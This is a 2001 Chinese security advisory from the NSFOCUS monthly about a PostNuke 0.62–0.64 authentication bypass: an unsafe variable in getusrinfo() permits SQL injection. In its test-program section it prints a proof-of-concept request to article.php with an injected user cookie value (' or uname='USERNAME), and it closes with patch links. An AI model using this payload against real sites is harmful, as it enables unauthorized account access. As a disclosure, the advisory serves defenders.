首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第27期->最新漏洞
日期:2001-11-08
受影响的系统:
PostNuke 0.62
PostNuke 0.63
PostNuke 0.64
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID : 3435
PostNuke是在PHPNuke的基础上改进的内容管理系统,发现其0.62到0.64版本存在一个
安全漏洞,导致远程攻击者只要知道用户名和用户ID即可不经过认证就登陆进入系统。
“article.php”调用“mainfile2.php”中的一个函数“getusrinfo()”更新用户信
息, 该函数进行了一次数据库查询,但是由于该查询使用了一个不安全的变量,导致
攻击者可能改变这个查询串,从而绕过认证直接进入系统。
<*来源:Magnus Skjegstad (lists@skjegstad.com)
参考:http://archives.neohapsis.com/archives/bugtraq/2001-10/0088.html
*>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Magnus Skjegstad (lists@skjegstad.com)提供了如下测试代码:
article.php?save=1&
sid=20& [any sid will do..]
cookieusrtime=160000& [to get a decent expire-date on the cookie]
user=USERID:USERNAME:' or uname='USERNAME [base64_encoded]
--------------------------------------------------------------------------------
建议:
厂商补丁:
目前厂商已经发布了补丁程序,请到厂商的主页下载:
http://prdownloads.sourceforge.net/post-nuke/64Mutant_Fix_article.zip
您也可以在厂商主页上升级到最新版本:
https://sourceforge.net/projects/post-nuke/
版权所有,未经许可,不得转载